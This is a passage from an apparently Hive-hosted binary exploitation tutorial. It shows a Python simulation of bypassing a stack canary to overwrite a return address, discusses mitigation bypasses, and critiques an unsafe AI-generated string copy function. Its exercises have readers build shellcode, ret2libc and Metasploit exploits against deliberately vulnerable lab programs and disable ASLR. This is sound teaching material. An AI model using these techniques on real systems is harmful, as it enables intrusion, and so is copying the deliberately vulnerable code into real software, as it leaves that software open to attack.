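    """buffer | canary | saved EBP | return address, low address first."""
    return bytearray(BUF_SIZE) + CANARY + struct.pack('<II', 0xbffff6c8, ret_addr)


def overflow(frame, data):
    """Write data from the start of the buffer with no bounds check."""
    frame[0:len(data)] = data
    return frame


def canary_intact(frame):
    """Stand-in for the check the function runs just before returning."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == CANARY


def return_address(frame):
    return struct.unpack_from('<I', frame, BUF_SIZE + 8)[0]


# Blind overflow: the canary is trampled, so the program would abort
blind = overflow(make_frame(), b'A' * 76)
print(canary_intact(blind))

# Overflow that replays a leaked canary: the check passes, the return address is ours
informed = overflow(make_frame(), b'A' * 64 + CANARY + b'BBBB' + struct.pack('<I', 0x43434343))
print(canary_intact(informed), hex(return_address(informed)))
```

Note the leading null byte in the canary. On Linux the canary's lowest byte is zero, so a string copy like strcpy cannot write a matching canary and keep going; replaying a leaked canary is mainly an option when the overflow comes from a length-based copy such as read or memcpy.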

# Check which protections a binary has
checksec --file=/usr/bin/target_service

# Real-world example:
# RELRO: Full RELRO
# Stack Canary: Canary found
# NX: NX enabled
# PIE: PIE enabled
# All four defenses active -- exploitation requires:
# 1. Information leak (to defeat ASLR + PIE + canary)
# 2. ROP chain (to defeat NX)
# 3. Chaining the leak with the ROP in a single exploit

Each mitigation makes exploitation harder. Chaining bypasses for ASLR + DEP + canaries + PIE is what separates script kiddies from exploit developers. A fully protected binary on a modern Linux distro (Ubuntu 24.04, Fedora 40) with all compiler defaults enabled requires an information disclosure vulnerability (to leak addresses and the canary), a ROP chain (to bypass NX), and enough control over the stack to execute the chain reliably. That's a real engineering challenge, and it's why many binary exploits in modern CVEs are valued at $50,000-$250,000+ in bug bounty programs ;-)

The AI Slop Connection

AI code generators produce buffer-overflow-vulnerable code at an alarming rate. They use strcpy instead of strncpy, sprintf instead of snprintf, gets instead of fgets. The AI learned from decades of vulnerable C code on the internet and reproduces the same dangerous patterns because those patterns are statistically dominant in its training data.

Worse, when developers ask AI to "make this code secure," it often adds superficial checks that don't actually prevent the overflow. A bounds check on one code path but not another. A length truncation that's off by one. A strncpy call that forgets to null-terminate the destination buffer (which is a classic strncpy gotcha -- unlike strcpy, strncpy does NOT guarantee null termination if the source is as long as or longer than the limit). The AI produces code that looks safe to a casual review but crumbles under adversarial input.

I've seen AI-generated C code where the developer asked for "a safe string copy function" and the AI generated:

// AI-generated "safe" copy -- STILL UNSAFE
void safe_copy(char *dest, const char *src, size_t dest_size) {
    if (strlen(src) < dest_size) {
        strcpy(dest, src);  // "safe" because we checked the length
    }
}

The length check itself is correct: strlen(src) < dest_size leaves room for the null terminator, so a source string of exactly dest_size - 1 characters makes strcpy write dest_size bytes, which just fits. The problems are around it. The strlen(src) call assumes src is null-terminated -- if it isn't, strlen will read past the end of the source buffer looking for a null byte, potentially causing a crash or information leak. And when the source is too long, the function silently does nothing: dest is left untouched (possibly uninitialized and unterminated) and the caller gets no return value telling it the copy failed, so the next piece of code that treats dest as a string may read garbage. The AI-generated "safe" version looks reasonable but introduces its own subtleties that a developer who doesn't understand the underlying memory model will not catch.

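The real solution is simpler: use snprintf(dest, dest_size, "%s", src). One function call that never writes more than dest_size bytes and always null-terminates as long as dest_size is nonzero. If the return value is greater than or equal to dest_size, the output was truncated and the caller can handle that explicitly. But in my experience AI assistants rarely suggest it, probably because snprintf appears less frequently in the training data than the strlen + strcpy pattern.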

The Debugging Mindset

I want to emphasize something before we close. Exploit development is not about memorizing techniques -- it's about developing a debugging mindset. Every vulnerability is different. The buffer size is different, the offset is different, the available space for shellcode is different, the bad characters are different, the enabled protections are different. What stays constant is the process: find the crash, control the crash, analyze the memory state, identify what you can overwrite, figure out where to redirect execution, build the payload, test, debug, iterate.

The GDB workflow I showed you above is the skeleton of that process. You will spend hours staring at hex dumps of stack memory, stepping through instructions one at a time, watching registers change, trying to understand why your exploit crashes instead of spawning a shell. And when it finally works -- when you see that $ prompt appear where it shouldn't -- you'll understand why people get addicted to this.

Having said that, the exploits in this episode all targeted a deliberately vulnerable program with all protections disabled. Real-world binaries have ASLR, stack canaries, NX, PIE, and sometimes CFI. Bypassing those protections requires information leaks, ROP chains, heap exploitation techniques, and a deep understanding of the target operating system's memory management. That's what the upcoming episodes will cover -- the modern mitigation bypass techniques that make binary exploitation in 2026 a completely different discipline from what it was in 2005.

Exercises

Exercise 1: Compile the vulnerable.c program from this episode (with protections disabled: -fno-stack-protector -z execstack -no-pie -m32). Use msf-pattern_create and msf-pattern_offset to find the exact offset to the return address. Then use msfvenom to generate Linux x86 shellcode and build a working exploit that spawns a shell. Document each step with GDB output showing the stack before and after overflow. Save your exploit and notes to ~/lab-tools/custom-exploit/exercise1/.

Exercise 2: Modify your exploit to use return-to-libc instead of shellcode injection. Find the addresses of system() and "/bin/sh" in libc (with ASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space). Build the ret2libc payload and verify you get a shell. Then re-enable ASLR (echo 2 | sudo tee /proc/sys/kernel/randomize_va_space) and document why the exploit fails -- what address changes, and what error does the program produce? Save to ~/lab-tools/custom-exploit/exercise2/.

Exercise 3: Write a Metasploit module for a simple vulnerable TCP service. Create a small C server that reads network input into a fixed-size buffer without bounds checking (similar to vulnerable.c but network-accessible on port 9999). It has to be C or another memory-unsafe language: a pure Python server is memory-safe, so oversized input will not overwrite a return address. Write the Metasploit module in Ruby following the template from this episode. Test the module from msfconsole and verify you get a session. Save both the server and module source code to ~/lab-tools/custom-exploit/exercise3/.

De groeten!

Hive account: @scipio
